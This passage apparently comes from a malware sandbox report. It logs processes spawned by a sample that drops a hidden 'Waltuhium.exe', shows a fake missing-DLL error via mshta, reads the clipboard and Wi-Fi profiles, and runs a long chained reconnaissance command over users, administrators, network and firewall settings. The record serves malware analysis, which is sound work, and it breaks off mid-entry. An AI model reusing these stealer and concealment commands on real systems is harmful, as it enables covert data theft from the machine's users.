File size:576'000 bytes
MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:16
Start time:18:38:34
Start date:12/11/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Imagebase:0x7ff799bb0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:17
Start time:18:38:34
Start date:12/11/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "tasklist"
Imagebase:0x7ff799bb0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:18
Start time:18:38:34
Start date:12/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

                                                                                                                                                                                                                                            Target ID:19
                                                                                                                                                                                                                                            Start time:18:38:34
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:20
                                                                                                                                                                                                                                            Start time:18:38:34
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:tasklist
                                                                                                                                                                                                                                            Imagebase:0x7ff6187b0000
                                                                                                                                                                                                                                            File size:106'496 bytes
                                                                                                                                                                                                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:21
                                                                                                                                                                                                                                            Start time:18:38:34
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:wmic csproduct get uuid
                                                                                                                                                                                                                                            Imagebase:0x7ff6e2c90000
                                                                                                                                                                                                                                            File size:576'000 bytes
                                                                                                                                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:22
                                                                                                                                                                                                                                            Start time:18:38:36
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\AppData\Local\WaltuhiumUpdateService\Waltuhium.exe""
                                                                                                                                                                                                                                            Imagebase:0x7ff799bb0000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:23
                                                                                                                                                                                                                                            Start time:18:38:36
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:24
                                                                                                                                                                                                                                            Start time:18:38:36
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:attrib +h +s "C:\Users\user\AppData\Local\WaltuhiumUpdateService\Waltuhium.exe"
                                                                                                                                                                                                                                            Imagebase:0x7ff60d400000
                                                                                                                                                                                                                                            File size:23'040 bytes
                                                                                                                                                                                                                                            MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:25
                                                                                                                                                                                                                                            Start time:18:38:36
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()""
                                                                                                                                                                                                                                            Imagebase:0x7ff799bb0000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:26
                                                                                                                                                                                                                                            Start time:18:38:36
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "tasklist"
                                                                                                                                                                                                                                            Imagebase:0x7ff799bb0000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:27
                                                                                                                                                                                                                                            Start time:18:38:36
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:28
                                                                                                                                                                                                                                            Start time:18:38:36
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:29
                                                                                                                                                                                                                                            Start time:18:38:36
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:tasklist
                                                                                                                                                                                                                                            Imagebase:0x7ff6187b0000
                                                                                                                                                                                                                                            File size:106'496 bytes
                                                                                                                                                                                                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:30
                                                                                                                                                                                                                                            Start time:18:38:36
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()"
                                                                                                                                                                                                                                            Imagebase:0x7ff7da520000
                                                                                                                                                                                                                                            File size:14'848 bytes
                                                                                                                                                                                                                                            MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:31
                                                                                                                                                                                                                                            Start time:18:38:38
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
                                                                                                                                                                                                                                            Imagebase:0x7ff799bb0000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:32
                                                                                                                                                                                                                                            Start time:18:38:38
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"
                                                                                                                                                                                                                                            Imagebase:0x7ff799bb0000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:33
                                                                                                                                                                                                                                            Start time:18:38:38
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:34
                                                                                                                                                                                                                                            Start time:18:38:38
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                            Imagebase:0x7ff799bb0000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:35
                                                                                                                                                                                                                                            Start time:18:38:38
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:36
                                                                                                                                                                                                                                            Start time:18:38:38
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"
                                                                                                                                                                                                                                            Imagebase:0x7ff799bb0000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

Target ID:37
Start time:18:38:38
Start date:12/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff70f330000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:38
Start time:18:38:38
Start date:12/11/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:39
Start time:18:38:38
Start date:12/11/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:cmd.exe /c chcp
Imagebase:0x7ff799bb0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:40
Start time:18:38:38
Start date:12/11/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:cmd.exe /c chcp
Imagebase:0x7ff799bb0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:41
Start time:18:38:38
Start date:12/11/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:powershell.exe Get-Clipboard
Imagebase:0x7ff788560000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:42
Start time:18:38:38
Start date:12/11/2024
Path:C:\Windows\System32\tasklist.exe
Wow64 process (32bit):false
Commandline:tasklist /FO LIST
Imagebase:0x7ff6187b0000
File size:106'496 bytes
MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:43
Start time:18:38:39
Start date:12/11/2024
Path:C:\Windows\System32\chcp.com
Wow64 process (32bit):false
Commandline:chcp
Imagebase:0x7ff7bca10000
File size:14'848 bytes
MD5 hash:33395C4732A49065EA72590B14B64F32
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:44
Start time:18:38:39
Start date:12/11/2024
Path:C:\Windows\System32\chcp.com
Wow64 process (32bit):false
Commandline:chcp
Imagebase:0x7ff7bca10000
File size:14'848 bytes
MD5 hash:33395C4732A49065EA72590B14B64F32
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:45
Start time:18:38:39
Start date:12/11/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
Imagebase:0x7ff799bb0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:46
Start time:18:38:39
Start date:12/11/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
Imagebase:0x7ff799bb0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:47
                                                                                                                                                                                                                                            Start time:18:38:39
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:48
                                                                                                                                                                                                                                            Start time:18:38:39
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:49
                                                                                                                                                                                                                                            Start time:18:38:39
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\systeminfo.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:systeminfo
                                                                                                                                                                                                                                            Imagebase:0x7ff691e70000
                                                                                                                                                                                                                                            File size:110'080 bytes
                                                                                                                                                                                                                                            MD5 hash:EE309A9C61511E907D87B10EF226FDCD
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:50
                                                                                                                                                                                                                                            Start time:18:38:39
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\netsh.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:netsh wlan show profiles
                                                                                                                                                                                                                                            Imagebase:0x7ff69f960000
                                                                                                                                                                                                                                            File size:96'768 bytes
                                                                                                                                                                                                                                            MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:51
                                                                                                                                                                                                                                            Start time:18:38:39
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                                                                                            Imagebase:0x7ff693ab0000
                                                                                                                                                                                                                                            File size:496'640 bytes
                                                                                                                                                                                                                                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:false
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:52
                                                                                                                                                                                                                                            Start time:18:38:40
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                                            Imagebase:0x7ff6eef20000
                                                                                                                                                                                                                                            File size:55'320 bytes
                                                                                                                                                                                                                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:false

                                                                                                                                                                                                                                            Target ID:53
                                                                                                                                                                                                                                            Start time:18:38:41
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\HOSTNAME.EXE
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:hostname
                                                                                                                                                                                                                                            Imagebase:0x7ff715560000
                                                                                                                                                                                                                                            File size:14'848 bytes
                                                                                                                                                                                                                                            MD5 hash:33AFAA43B84BDEAB12E02F9DBD2B2EE0
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:54
                                                                                                                                                                                                                                            Start time:18:38:41
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:wmic logicaldisk get caption,description,providername
                                                                                                                                                                                                                                            Imagebase:0x7ff6e2c90000
                                                                                                                                                                                                                                            File size:576'000 bytes
                                                                                                                                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:55
                                                                                                                                                                                                                                            Start time:18:38:42
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\net.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:net user
                                                                                                                                                                                                                                            Imagebase:0x7ff732790000
                                                                                                                                                                                                                                            File size:59'904 bytes
                                                                                                                                                                                                                                            MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:56
                                                                                                                                                                                                                                            Start time:18:38:42
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\net1.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\net1 user
                                                                                                                                                                                                                                            Imagebase:0x7ff671c90000
                                                                                                                                                                                                                                            File size:183'808 bytes
                                                                                                                                                                                                                                            MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:57
                                                                                                                                                                                                                                            Start time:18:38:42
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\query.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:query user
                                                                                                                                                                                                                                            Imagebase:0x7ff757550000
                                                                                                                                                                                                                                            File size:17'408 bytes
                                                                                                                                                                                                                                            MD5 hash:29043BC0B0F99EAFF36CAD35CBEE8D45
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:58
                                                                                                                                                                                                                                            Start time:18:38:42
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\quser.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:"C:\Windows\system32\quser.exe"
                                                                                                                                                                                                                                            Imagebase:0x7ff6d1c10000
                                                                                                                                                                                                                                            File size:25'600 bytes
                                                                                                                                                                                                                                            MD5 hash:480868AEBA9C04CA04D641D5ED29937B
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            Target ID:60
                                                                                                                                                                                                                                            Start time:18:38:43
                                                                                                                                                                                                                                            Start date:12/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\net.exe
